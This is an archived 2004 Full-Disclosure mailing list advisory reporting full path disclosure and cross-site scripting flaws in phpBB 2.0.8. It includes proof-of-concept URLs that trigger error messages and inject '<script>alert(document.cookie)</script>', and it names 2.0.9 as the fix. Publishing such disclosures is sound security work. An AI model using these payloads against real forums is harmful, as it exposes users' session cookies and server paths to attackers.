[Full-Disclosure] [waraxe-2004-SA#034 - XSS and path full path disclosure in PhpBB 2.0.8]
From: Janek Vind (come2waraxe_at_yahoo.com)
Date: 07/16/04
- Previous message: Sebastian Krahmer: "[Full-Disclosure] SUSE Security Announcement: php4 (SUSE-SA:2004:021)"
- Next in thread: D'Amato Luigi: "[Full-Disclosure] [Tool] HardTCP "Hardening TCP/IP" + SOURCE"
- Reply: D'Amato Luigi: "[Full-Disclosure] [Tool] HardTCP "Hardening TCP/IP" + SOURCE"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: full-disclosure@lists.netsys.com Date: Fri, 16 Jul 2004 07:20:19 -0700 (PDT)
{================================================================================}
{ [waraxe-2004-SA#034]
}
{================================================================================}
{
}
{ [ XSS and full path disclosure in
PhpBB 2.0.8 ] }
{
}
{================================================================================}
Author: Janek Vind "waraxe"
Date: 16. July 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=34
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PhpBB is widely used and very popular forum software,
written in php.
Homepage: http://www.phpbb.com/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
There are some uninitialized arrays in phpBB code,
which can lead to XSS and full
path disclosure. "register_globals" must be enabled on
server for those bugs to be
exploitable.
A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A1 - full path disclosure in "index.php":
http://localhost/phpbb208/index.php?category_rows=waraxe
Fatal error: [] operator not supported for strings in
D:\apache_wwwroot\phpbb208\index.php on line 120
A2 - full path disclosure in
"language\lang_english\lang_faq.php":
http://localhost/phpbb208/faq.php?faq=waraxe
Fatal error: [] operator not supported for strings in
D:\apache_wwwroot\phpbb208\language\lang_english\lang_faq.php
on line 41
A3 - full path disclosure in
"language\lang_english\lang_bbcode.php ":
http://localhost/phpbb208/faq.php?mode=bbcode&faq=waraxe
Fatal error: [] operator not supported for strings in
D:\apache_wwwroot\phpbb208\language\lang_english\lang_bbcode.php
on line 46
A4 - full path disclosure in
"includes\usercp_viewprofile.php":
http://localhost/phpbb208/profile.php?mode=viewprofile&u=2&ranksrow=waraxe
Fatal error: [] operator not supported for strings in
D:\apache_wwwroot\phpbb208\includes\usercp_viewprofile.php
on line 46
B - Cross-site scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
B1 - XSS in "index.php":
http://localhost/phpbb208/index.php?category_rows[0][cat_id]=1
&category_rows[0][cat_title]=waraxe<script>alert(document.cookie);</script>
&category_rows[0][cat_order]=99
B2 - XSS in "language\lang_english\lang_faq.php":
http://localhost/phpbb208/faq.php?
faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=waraxe
B3 - XSS in "language\lang_english\lang_bbcode.php ":
http://localhost/phpbb208/faq.php?mode=bbcode&
faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=waraxe
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected versions are 2.0.8 and probaly older 2.x
versions too.
Vendor has released new version - 2.0.9 - which is
patched against discussed
bugs and contain many other improvements.
phpBB 2.0.9 packages can be downloaded at:
http://www.phpbb.com/downloads.php
Additional information and discussion at waraxe forum:
http://www.waraxe.us/forums.html
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna and to
http://www.gamecheaters.us staff!
Special greets to icenix and slimjim100!
Tervitused - Heintz ja Maku!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ]
------------------------------------
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: Sebastian Krahmer: "[Full-Disclosure] SUSE Security Announcement: php4 (SUSE-SA:2004:021)"
- Next in thread: D'Amato Luigi: "[Full-Disclosure] [Tool] HardTCP "Hardening TCP/IP" + SOURCE"
- Reply: D'Amato Luigi: "[Full-Disclosure] [Tool] HardTCP "Hardening TCP/IP" + SOURCE"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
